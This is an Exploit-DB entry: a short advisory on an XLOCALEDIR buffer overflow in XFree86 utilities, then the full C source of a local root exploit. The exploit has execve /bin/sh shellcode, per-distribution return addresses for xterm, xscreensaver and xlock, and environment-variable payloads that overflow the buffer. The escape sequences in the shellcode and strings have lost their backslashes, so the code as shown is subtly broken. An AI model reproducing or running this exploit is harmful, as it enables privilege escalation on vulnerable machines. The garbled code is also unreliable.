https://www.exploit-db.com/exploits/22323

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/7002/info
  
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
  
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.

/* XFree86 XLOCALEDIR env local root exploit
  coded by [email protected]
  PH4NT0M SECURITY TEAM

  bug is reported at  www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4516
  this bug was founded by tarranta & dcryptr 3 january 2003
  dcryptr and angello have given exploits
  this exploit is base on that two exploits

  tested on REDHAT 9
  but there isn't a 's' for these two files.so we can't get a rootshell.
  
  just for fun!  

*/
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
#include <string.h>
#include <stdio.h>

//#define RET 0xbffffe50 // on rh9 ,RETADDR could be 0xbffff00---0xbffffe90  ===>tha's will be good!

char shellcode[]=
 "x31xdb"
"x89xd8"
"xb0x17"
"xcdx80"
"x31xdb"
"x89xd8"
"xb0x17"
"xcdx80"
"x31xdb"
"x89xd8"
"xb0x2e"
"xcdx80"
"x31xc0"
"x50"
"x68x2fx2fx73x68"
"x68x2fx62x69x6e"
"x89xe3"
"x50"
"x53"
"x89xe1"
"x31xd2"
"xb0x0b"
"xcdx80"
"x31xdb"
"x89xd8"
"xb0x01"
"xcdx80";

struct target{
  int num;
  char *version;
  char *dest;
  char *name;
  unsigned long ret;
  int bufsize;

};


struct target exploit[]={
  {1,"Redhat linux 9.0 --","/usr/X11R6/bin/xterm","xterm",0xbffffe50,4076},
  {2,"Redhat linux 9.0 --","/usr/X11R6/bin/xscreensaver","xscreensaver",0xbffffe50,4076},
 
  //this ret on rh7.3 is supplied by angelo rosiello
  {3,"Redhat linux 7.3 --","/usr/X11R6/bin/xscreensaver","xscreensaver",0xbfffdf20,4076},

  //these 3 ret on slackware followed is supplied by dcryptr
  {4,"Slackware 8.1 --","/usr/X11R6/bin/xscreensaver","xscreensaver",0xbfffe861,6000},
  {5,"Slackware 8.1 --","/usr/X11R6/bin/xterm","xterm",0xbfffe86d,6000},
  {6,"Slackware 8.1 --","/usr/X11R6/bin/xlock","xlock",0xbfffe86d,6000},    
  {0,NULL,NULL,NULL,0,0} 
};


void usage(char *c);

int main(int argc, char **argv){
  char buf[4076];
  int i; 
  int type;
  int options;
  int size;
  unsigned long ret;
  
  //options of the exploit
  while((options=getopt(argc,argv,"ht:"))!=-1){
    switch(options){
       case 'h':
	 usage(argv[0]);
         exit(0);
       case 't':
         type=atoi(optarg);
         
         if(type>6||type<0){
           printf("Wrong Target!nn");
           exit(0);
    
         }
     
         if(type==0){
	   usage(argv[0]);
           printf("Please select target num !n");
           printf("======================================n");
           for(i=0;exploit[i].dest;i++)
           fprintf(stderr,"[%d]  | %s  %s  n",exploit[i].num,exploit[i].version,exploit[i].dest);
	     exit(1);
  

         }
	 break;
    default:
      usage(argv[0]);
      exit(0);      

     }

  }

  size=exploit[type-1].bufsize;
  ret=exploit[type-1].ret;
    
  //set the env to buf,first time.
  memset(buf,0x41,4072);
  memcpy(buf+2076,&ret,0x4);  //the value 2076 is knows form angelo roseillo's exploit
  setenv("XLOCALEDIR",buf,1);
  
  //buffer now has changed ,set env to buf for the second time!
  memset(buf,0x90,size); 
  memcpy(buf+4000+i,shellcode,strlen(shellcode));
  setenv("PH4NT0M",buf,1);


  printf("n++++++++++++++++++++++++++++++n");
  printf("Xfree86 XLOCALEDIR env local root exploitn");
  printf("++++++++++++++++++++++++++++++++nn");
  printf("coded by aXis,[email protected]");
  printf("PST,www.ph4nt0m.orgnn");  
  printf("retaddr is at 0x%lx  n",ret);
  printf("buf is at 0x%lx n",&buf);
  
  if(execl((exploit[type-1].dest),(exploit[type-1].name),0)==-1){
    fprintf(stderr,"failed,try another target! -h for helpnn");
      exit(-1);
  }
  
  return 0;
} 

void usage(char *c){
  fprintf(stderr,"n===XFree86 XLOCALEDIR env local root exploit====n"
                             "====coded by aXis===========n"
                             "[email protected]"
                             "===PH4NT0M SECURITY TEAM      www.ph4nt0m.org===nn"
                             "usage: %s [-h] [-t <num>]n"
                             "Options:n"
                             "   -h:t this help.n"
	                     "   -t num:t select the target type,try 0 for listnn",c);
  

}